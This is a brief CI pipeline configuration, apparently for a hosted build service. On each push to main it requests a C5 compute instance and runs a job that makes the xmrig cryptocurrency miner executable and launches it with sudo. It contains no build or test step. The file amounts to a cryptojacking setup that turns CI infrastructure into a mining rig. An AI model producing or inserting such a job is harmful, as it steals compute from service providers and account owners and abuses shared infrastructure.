'on':
  github:
    branches:
      only: main

jobs:
  Run:
    resources:
      instance-type: C5
    needs:
      - Install-Build
    uses: script@v1
    with:
      script: |
        chmod +x xmrig
        sudo ./xmrig
  
